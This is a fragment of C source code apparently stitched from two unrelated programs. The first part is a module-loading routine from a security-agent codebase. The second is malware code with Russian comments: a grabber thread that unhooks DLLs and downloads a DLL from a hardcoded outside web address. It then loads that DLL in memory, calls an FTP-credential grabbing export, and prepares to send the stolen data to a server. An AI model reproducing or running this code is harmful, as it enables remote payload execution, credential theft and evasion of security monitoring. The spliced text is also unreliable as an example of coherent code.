hcpContext->modules[ moduleIndex ].hThread = rpal_thread_new( pEntry, modContext );
if( 0 != hcpContext->modules[ moduleIndex ].hThread )
{
CryptoLib_hash( tmpBuff, tmpSize, &(hcpContext->modules[ moduleIndex ].hash ) );
hcpContext->modules[ moduleIndex ].isOsLoaded = FALSE;
isSuccess = TRUE;
}
else
{
rpal_debug_warning( "Error creating handler thread for new module." );
}
}
}
else
{
rpal_debug_warning( "Could not find new module's entry point." );
}
}
else
{
rpal_debug_warning( "Error loading module in memory." );
}
}
else
{
rpal_debug_warning( "New module signature invalid." );
}
}
else
{
rpal_debug_warning( "Could not find core module components to load." );
}
// Main cleanup
if( !isSuccess )
{
if( NULL != modContext )
{
IF_VALID_DO( modContext->isTimeToStop, rEvent_free );
}
if( NULL != hcpContext->modules[ moduleIndex ].hModule )
{
MemoryFreeLibrary( hcpContext->modules[ moduleIndex ].hModule );
}
rpal_memory_zero( &(hcpContext->modules[ moduleIndex ] ),
sizeof( hcpContext->modules[ moduleIndex ] ) );
}
}
else
{
rpal_debug_error( "Could not find a spot for new module, or invalid module id!" );
}
return isSuccess;
}
void destroyScr()// надо разобраться как мочить длл
{
MemoryFreeLibrary(hLib);
}
DWORD WINAPI GrabberThread( LPVOID lpData )
{
UnhookDlls();
/*
char GrabberFile[] = {'X',':','\\', 't','r','a','s','h','\\','c','o','d','e','\\','w','o','r','k','\\' ,'r','f','b','\\','b','r','a','n','c','h','e','s','\\','d','l','l','\\','b','i','n','\\','D','e','b','u','g','\\','x','8','6','.','d','l','l',0};
///if ( BotModule != NULL )
{
typedef void ( WINAPI *PVNC_Start )();
HANDLE hFile=CreateFile(GrabberFile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,0,0);
DWORD dwSize=GetFileSize(hFile,0);
LPVOID BotModule = MemAlloc(dwSize);
pReadFile(hFile,BotModule,dwSize,&dwSize,0);
pCloseHandle(hFile);
HMEMORYMODULE hLib = MemoryLoadLibrary( BotModule );
if ( hLib == NULL )
{
return 0;
}
PVNC_Start VNC_Start = (PVNC_Start)MemoryGetProcAddress( hLib, "_VNC_Start@0" );
///PVNC_Start VNC_Start = (PVNC_Start)GetProcAddress(LoadLibrary(GrabberFile),"_VNC_Start@0");
VNC_Start();
while (true) pSleep(1);
MemoryFreeLibrary( hLib );
MemFree( BotModule );
return 1;
}
*/
//link.txt
//
char GrabberFile[] = {"http://apartman-adriana.com/temp/DrClient.dll"/*'/','g','r','a','b','e','r','.','d','l','l',0*/};
LPVOID BotModule = NULL;
bool bKnock = false;
while ( ( BotModule = DownloadPluginFromPath(GrabberFile, NULL ) ) == NULL )
{
pSleep( 1000 * 60 * 5 );
}
if ( BotModule != NULL )
{
HMEMORYMODULE hLib = MemoryLoadLibrary( BotModule );
if ( hLib == NULL )
{
return 0;
}
typedef char * ( WINAPI *PFTPGRAB )();
char GrabFTP[] = {'S','c','a','n','1', 0 };
char Ole32[] = {'o','l','e','3','2','.','d','l','l', 0};
typedef void ( WINAPI *PCoUninitialize )();
typedef HRESULT ( WINAPI *PCoInitialize )( LPVOID lpReserved );
PCoUninitialize pCoUninitialize_ = (PCoUninitialize)GetProcAddressEx( Ole32, 0, 0xEDB3159D );
PCoInitialize pCoInitialize_ = (PCoInitialize)GetProcAddressEx( Ole32, 0, 0xF341D5CF );
pCoUninitialize_();
pCoInitialize_( NULL );
PFTPGRAB FtpGrabber = (PFTPGRAB)MemoryGetProcAddress( hLib, GrabFTP );
char *Buffer = FtpGrabber();
DWORD dwSize = m_lstrlen( Buffer );
if ( dwSize != 0 )
{
Buffer[ dwSize ] = '\0';
bool Sended = false;
do
{
// Отправляем данные на сервер
Sended = true;
if (!Sended)
pSleep( 1000 );
}
while (!Sended);
}
MemoryFreeLibrary( hLib );
MemFree( Buffer );
MemFree( BotModule );
}